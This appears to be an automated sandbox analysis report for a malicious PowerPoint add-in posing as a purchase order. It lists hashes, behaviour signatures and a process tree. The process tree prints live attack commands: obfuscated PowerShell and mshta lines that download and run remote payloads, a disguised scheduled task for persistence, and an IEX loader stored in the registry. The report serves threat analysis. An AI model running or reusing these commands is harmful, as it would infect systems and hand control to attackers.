Resubmissions

25-08-2021 09:54

210825-79rzfjvlw2 10

25-08-2021 09:51

210825-tbz8595366 10

28-04-2021 22:50

210428-csmgr8bxe2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1615s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    25-08-2021 09:51

General

  • Target

    PO - CE AUSTRALIA PTY LTD.ppam

  • Size

    10KB

  • MD5

    7c629522213c57c3b3d66ee8e6c13fed

  • SHA1

    352b55636c67a5cd27a998888df0a137ef5433d8

  • SHA256

    a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04

  • SHA512

    385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 22 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1992
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://www.j.mp/llsoaskokcdokoktewelvw
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1828
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $www='https://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles.com/ugd/73cceb_4906e68401a54bdf99cdcca2ef189f9d.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC'.Replace('AAAAAAAAAAA','t Syste').Replace('BBBBBBBBBBBBBB','et.We');$bbb='lieCCCCCCCCCCnloaOOOOOOOOOOOOOOOring($www);'.Replace('CCCCCCCCCC','nt).Dow').Replace('OOOOOOOOOOOOOOO','dst');$hbar=I`E`X ($sss,$aaa,$bbb-Join '')|I`E`X;
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1168
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Public\kuchb.vbs"
            4⤵
            • Modifies registry class
            PID:2612
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-1.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-2.txt') -useB);i'E'x(iwr('https://ia601500.us.archive.org/9/items/FTp-120-May12/19-3.txt') -useB)
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/19.html\"
          3⤵
          • Creates scheduled task(s)
          PID:1620
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe ((gp HKCU:\Software).nasdnasndnad)|IEX
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1680

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1168-81-0x00000000048C0000-0x00000000048C1000-memory.dmp

      Filesize

      4KB

    • memory/1168-75-0x0000000000A70000-0x0000000000A71000-memory.dmp

      Filesize

      4KB

    • memory/1168-93-0x00000000048C2000-0x00000000048C3000-memory.dmp

      Filesize

      4KB

    • memory/1680-126-0x000000001B730000-0x000000001B731000-memory.dmp

      Filesize

      4KB

    • memory/1680-88-0x00000000025E0000-0x00000000025E1000-memory.dmp

      Filesize

      4KB

    • memory/1680-170-0x000000001AB3A000-0x000000001AB59000-memory.dmp

      Filesize

      124KB

    • memory/1680-146-0x000000001AB20000-0x000000001AB21000-memory.dmp

      Filesize

      4KB

    • memory/1680-145-0x000000001AB10000-0x000000001AB11000-memory.dmp

      Filesize

      4KB

    • memory/1680-82-0x0000000001DE0000-0x0000000001DE1000-memory.dmp

      Filesize

      4KB

    • memory/1680-98-0x000000001C370000-0x000000001C371000-memory.dmp

      Filesize

      4KB

    • memory/1680-96-0x000000001B6A0000-0x000000001B6A1000-memory.dmp

      Filesize

      4KB

    • memory/1680-84-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

      Filesize

      4KB

    • memory/1680-85-0x000000001AB34000-0x000000001AB36000-memory.dmp

      Filesize

      8KB

    • memory/1680-83-0x000000001AB30000-0x000000001AB32000-memory.dmp

      Filesize

      8KB

    • memory/1680-89-0x0000000002790000-0x0000000002791000-memory.dmp

      Filesize

      4KB

    • memory/1680-129-0x000000001B760000-0x000000001B761000-memory.dmp

      Filesize

      4KB

    • memory/1724-92-0x0000000004892000-0x0000000004893000-memory.dmp

      Filesize

      4KB

    • memory/1724-107-0x0000000006320000-0x0000000006321000-memory.dmp

      Filesize

      4KB

    • memory/1724-123-0x00000000066E0000-0x00000000066E1000-memory.dmp

      Filesize

      4KB

    • memory/1724-90-0x0000000002710000-0x0000000002711000-memory.dmp

      Filesize

      4KB

    • memory/1724-102-0x0000000005850000-0x0000000005851000-memory.dmp

      Filesize

      4KB

    • memory/1724-94-0x0000000004850000-0x0000000004851000-memory.dmp

      Filesize

      4KB

    • memory/1724-101-0x000000007EF30000-0x000000007EF31000-memory.dmp

      Filesize

      4KB

    • memory/1724-115-0x0000000006500000-0x0000000006501000-memory.dmp

      Filesize

      4KB

    • memory/1724-108-0x00000000063E0000-0x00000000063E1000-memory.dmp

      Filesize

      4KB

    • memory/1724-80-0x0000000004890000-0x0000000004891000-memory.dmp

      Filesize

      4KB

    • memory/1724-86-0x00000000048D0000-0x00000000048D1000-memory.dmp

      Filesize

      4KB

    • memory/1992-65-0x000007FEFC471000-0x000007FEFC473000-memory.dmp

      Filesize

      8KB

    • memory/2036-67-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-64-0x0000000076A81000-0x0000000076A83000-memory.dmp

      Filesize

      8KB

    • memory/2036-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2036-60-0x0000000074BD1000-0x0000000074BD5000-memory.dmp

      Filesize

      16KB

    • memory/2036-61-0x0000000071C71000-0x0000000071C73000-memory.dmp

      Filesize

      8KB